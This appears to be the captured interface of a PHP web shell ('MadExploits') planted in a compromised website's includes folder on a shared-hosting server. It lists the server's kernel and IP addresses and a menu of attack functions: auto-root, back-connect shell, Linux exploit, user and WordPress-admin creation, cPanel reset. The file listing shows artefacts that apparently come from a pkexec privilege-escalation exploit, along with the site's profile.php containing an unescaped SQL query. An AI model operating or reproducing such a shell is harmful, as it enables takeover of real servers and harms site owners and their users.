Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
public_html /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
5.26
KB
-rw-r--r--
footer.php
2.07
KB
-rw-r--r--
footer2.php
7.72
KB
-rw-r--r--
header.php
3.05
KB
-rw-r--r--
header2.php
1.74
KB
-rw-r--r--
main_content.php
4.86
KB
-rw-r--r--
navbar.php
10.83
KB
-rw-r--r--
navbar2.php
3.95
KB
-rw-r--r--
profile.php
1.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.php
<?php ?> <div id="profile"> <?php $show = $_SESSION ["sess_user"]; echo '<img src="'.$link.'images2/'.$photo.'" height="190" width="180"><br/> '; ?> <?php ?> <br/> <ul> <?php /* $show = $_SESSION ["sess_user"]; $sql = "SELECT id FROM messages WHERE recipient ='$show' && status='unread' "; $run= mysqli_query($con,$sql); $check= mysqli_num_rows($run); if($check ==1){ echo '<li><a href="viewmessages.php?pageno=1">'.$check.' unread message</a></li>'; } elseif($check > 1){ echo '<li><a href="viewmessages.php?pageno=1">'.$check.' unread messages</a></li>'; } else{ echo '<li><a href="viewmessages.php?pageno=1">Read messages</a></li>'; } ?> <li><a href="myupdate.php?user=<?php echo $show;?>&pageno=1">My updates</a></li> <li><a href="mylibrary.php?pageno=1">My library</a></li> <li><a href="photoalbum.php?user=<?php echo $show;?>&pageno=1">Photo album</a></li> <li><a href="editphoto.php">Edit photo</a></li> <li><a href="editprofile.php">Edit profile</a></li> <li><a href="editcourses.php">Edit courses</a></li> </ul> </div> </div> <?php ?> </div></div> */
Close